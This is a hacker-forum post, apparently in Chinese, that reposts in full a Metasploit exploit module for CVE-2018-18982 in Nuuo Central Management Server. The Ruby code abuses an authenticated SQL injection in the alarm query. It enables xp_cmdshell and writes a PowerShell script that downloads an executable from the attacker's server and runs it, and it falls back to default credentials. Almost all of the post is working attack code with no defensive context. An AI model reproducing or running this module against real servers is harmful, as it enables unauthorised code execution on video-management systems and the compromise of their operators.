跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit)


风尘剑心

推荐的帖子

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Nuuo
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'            => 'Nuuo Central Management Authenticated SQL Server SQLi',
      'Description'     => %q{
      The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
      This module will either use a provided session number (which can be guessed with an auxiliary
      module) or attempt to login using a provided username and password - it will also try the
      default credentials if nothing is provided.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pedro Ribeiro <pedrib@gmail.com>'  # Vulnerability discovery and Metasploit module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-18982' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]

        ],
      'Platform'        => 'win',
      'Arch'            => ARCH_X86,
      'Stance'          => Msf::Exploit::Stance::Aggressive,  # we need this to run in the foreground
      'Targets'         =>
        [
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
        ],
      'Notes'           =>
        {
          'SideEffects'   => [ ARTIFACTS_ON_DISK ]
        },
      'Privileged'      => false,  # we run as NETWORK_SERVICE
      'DisclosureDate'  => 'Oct 11 2018',
      'DefaultTarget'   => 0))
    register_options [
      Opt::RPORT(5180),
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
    ]
  end


  def inject_sql(sql, final = false)
    sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
    if final
      nucs_send_msg_async(sql)
    else
      nucs_send_msg(sql)
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    unless @pl
      print_error("A request came in, but the payload wasn't ready yet!")
      return
    end
    print_good('Sending the payload to CMS...')
    send_response(cli, @pl)

    Rex.sleep(3)

    print_status('Executing shell...')
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
    register_file_for_cleanup("c:/windows/temp/#{@filename}")
  end

  def create_hex_cmd(cmd)
    var = rand_text_alpha(2)
    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
    cmd.each_byte { |b|
      hex_cmd << b.to_i.to_s(16)
    }
    hex_cmd << "; exec (@#{var})"
  end

  def primer
    # we need to roll our own here instead of using the MSSQL mixins
    # (tried that and it doesn't work)
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
    download_pl = %{xp_cmdshell }
    download_pl << %{'cd C:\\windows\\temp\\ && }
    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}

    print_status('Injecting PowerShell payload')
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
    register_file_for_cleanup("c:/windows/temp/#{ps1}")
  end

  def exploit
    nucs_login

    unless @nucs_session
      fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
    end

    @pl = generate_payload_exe

    #do not use SSL
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    begin
      Timeout.timeout(datastore['HTTPDELAY']) {super}
    rescue Timeout::Error
      datastore['SSL'] = true if ssl_restore
    end
  end
end
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...